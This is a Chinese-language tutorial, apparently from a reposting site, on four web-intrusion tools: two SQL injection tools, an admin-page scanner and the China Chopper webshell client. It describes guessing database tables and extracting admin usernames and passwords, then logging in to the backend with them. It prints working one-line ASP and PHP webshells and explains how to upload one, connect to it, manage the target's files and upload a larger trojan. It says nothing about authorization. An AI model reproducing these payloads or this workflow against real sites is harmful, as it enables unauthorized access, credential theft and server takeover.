明小子：

明小子主要功能為“SQL注入猜解”，手工猜測(cè)太過(guò)繁瑣，使用明小子可以檢測(cè)是否存在注入點(diǎn)，猜解表名，列名和字段數(shù)據(jù)（用戶名和密碼）

使用：

1.單擊工具中的“SQL注入猜解”，輸入網(wǎng)站地址，檢測(cè)是否存在注入點(diǎn)。

2.點(diǎn)擊“猜解表名”，猜出數(shù)據(jù)庫(kù)表名

3.選定猜解出的表名，猜解表中字段名和字段值

4.猜解后臺(tái)地址，使用猜到的用戶名和密碼進(jìn)行登陸

啊D注入工具：

1、掃描注入點(diǎn)

使用啊D對(duì)網(wǎng)站進(jìn)行掃描，輸入網(wǎng)址就行

2、SQL注入檢測(cè)

檢測(cè)已知可以注入的鏈接

3、管理入口檢測(cè)

檢測(cè)網(wǎng)站登陸的入口點(diǎn)，如果已經(jīng)得到用戶名和密碼的話，可以用這個(gè)掃描一下，看能否找到后臺(tái)進(jìn)行登陸

4、瀏覽網(wǎng)頁(yè)

可以用這個(gè)瀏覽網(wǎng)頁(yè)，如果遇到網(wǎng)頁(yè)中存在可以注入的鏈接將提示

御劍：

御劍后臺(tái)掃描枚舉可能的后臺(tái)路徑 找到后臺(tái)看是啥系統(tǒng)可以爆庫(kù)或者利用漏洞進(jìn)后臺(tái)就簡(jiǎn)單多了

1.輸入目標(biāo)站點(diǎn)的url，點(diǎn)擊掃描

2.掃描結(jié)果分析：
HTTP響應(yīng)值為200,代表頁(yè)面可以訪問(wèn)
雙擊鏈接http://../index.asp，進(jìn)入目標(biāo)站點(diǎn)主頁(yè)
雙擊鏈接http://../admin/login.asp, 進(jìn)入后臺(tái)管理頁(yè)面 ?（掃描網(wǎng)站登錄后臺(tái)）

雙擊鏈接http://../FCKeditor/admin_login.html,該站點(diǎn)的編輯器類型為FCK以及版本號(hào) ?（掃描編輯器登錄后臺(tái)）

中國(guó)菜刀：

下載地址：http://www.onlinedown.net/soft/588101.htm

1.中國(guó)菜刀支持的服務(wù)端腳本：PHP、ASP，主要用于連接一句話木馬。

2.主要功能有：文件管理（有足夠的權(quán)限時(shí)候可以管理整個(gè)磁盤(pán)/文件系統(tǒng)），數(shù)據(jù)庫(kù)管理，虛擬終端。

常用的一句話木馬：

asp的一句話是：<%eval request("lubr")%>

php的一句話是：<?php @eval($_POST['lubr']);?>

使用：

1.上傳一句話木馬，記錄木馬地址，例如http://192.168.1.3:8080/up/images/lubr.php
2.菜刀連接：

進(jìn)入中國(guó)菜刀目錄，點(diǎn)擊chopper.exe
右鍵點(diǎn)擊添加，在地址欄中添加上傳文件路徑，右側(cè)添加密碼lubr, 腳本類型選擇PHP

右鍵點(diǎn)擊文件管理，查看目標(biāo)服務(wù)器的完整目錄，可進(jìn)行創(chuàng)建文件，修改文件，上傳下載等操作，如上傳大馬。

總結(jié)

以上是生活随笔為你收集整理的明小子注入工具+啊D注入工具+御剑后台扫描工具+中国菜刀一句话木马的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。